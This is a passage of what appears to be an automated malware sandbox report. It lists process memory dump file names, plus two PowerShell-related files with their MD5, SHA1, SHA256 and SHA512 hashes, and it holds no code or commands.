memory/3228-146-0x0000000000000000-mapping.dmp
memory/3196-147-0x0000000000000000-mapping.dmp
memory/2736-148-0x0000000000000000-mapping.dmp
memory/3704-149-0x0000000000000000-mapping.dmp
memory/400-150-0x0000000000000000-mapping.dmp
memory/1188-151-0x0000000000000000-mapping.dmp
memory/808-152-0x0000000000000000-mapping.dmp
memory/3312-153-0x0000000000000000-mapping.dmp
memory/3672-154-0x0000000000000000-mapping.dmp
memory/3560-155-0x0000000000000000-mapping.dmp
memory/1776-156-0x0000000000000000-mapping.dmp
memory/596-157-0x0000000000000000-mapping.dmp
memory/708-158-0x0000000000000000-mapping.dmp
memory/1292-159-0x0000000000000000-mapping.dmp
memory/4012-160-0x0000000000000000-mapping.dmp
memory/2424-161-0x0000000000000000-mapping.dmp
memory/2132-162-0x0000000000000000-mapping.dmp
memory/1460-163-0x0000000000000000-mapping.dmp
memory/1624-164-0x0000000000000000-mapping.dmp
memory/1476-165-0x0000000000000000-mapping.dmp
memory/4068-166-0x0000000000000000-mapping.dmp
memory/2980-167-0x0000000000000000-mapping.dmp
memory/3780-168-0x0000000000000000-mapping.dmp
memory/3204-169-0x0000000000000000-mapping.dmp
memory/1436-170-0x0000000000000000-mapping.dmp
memory/3216-171-0x0000000000000000-mapping.dmp
memory/3000-172-0x0000000000000000-mapping.dmp
memory/2468-173-0x0000000000000000-mapping.dmp
memory/2176-174-0x0000000000000000-mapping.dmp
memory/1428-175-0x0000000000000000-mapping.dmp
memory/644-176-0x0000000000000000-mapping.dmp
memory/3784-177-0x0000000000000000-mapping.dmp
memory/3564-178-0x0000000000000000-mapping.dmp
memory/4064-180-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-179-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-181-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-182-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-183-0x000001E4F0CE0000-0x000001E4F0D02000-memory.dmp
memory/4064-184-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-185-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-186-0x000001E4F1180000-0x000001E4F11F6000-memory.dmp
memory/4064-187-0x000001E4F05D0000-0x000001E4F05D2000-memory.dmp
memory/4064-188-0x000001E4F05D3000-0x000001E4F05D5000-memory.dmp
memory/4064-189-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/4064-209-0x000001E4F05D6000-0x000001E4F05D8000-memory.dmp
memory/4064-214-0x000001E4F0470000-0x000001E4F0472000-memory.dmp
memory/3516-216-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/3516-217-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-218-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-219-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-220-0x0000028C750F0000-0x0000028C75112000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5abfed05445cc556b236546ae58f8aa9 |
| SHA1 | a8d91d0d126a31291eb668881807d0403459c671 |
| SHA256 | fc8d157ccbb8e88f3c9647d5525afc1830551ae908e55290aa1e9559774d8c9d |
| SHA512 | 2924f778064004867e154d047cf67ceecdeb2cef42908396fee996f9b168afbc3c831269b39ac843302154d198389f3bce8984978036017b0ca795ad8608589f |
memory/3516-222-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-223-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/4064-224-0x000001E4F05D8000-0x000001E4F05D9000-memory.dmp
memory/3516-226-0x0000028C750E0000-0x0000028C750E2000-memory.dmp
memory/3516-225-0x0000028C75670000-0x0000028C756E6000-memory.dmp
memory/3516-227-0x0000028C750E3000-0x0000028C750E5000-memory.dmp
memory/3516-228-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-252-0x0000028C730D0000-0x0000028C730D2000-memory.dmp
memory/3516-253-0x0000028C750E6000-0x0000028C750E8000-memory.dmp
memory/3516-254-0x0000028C750E8000-0x0000028C750E9000-memory.dmp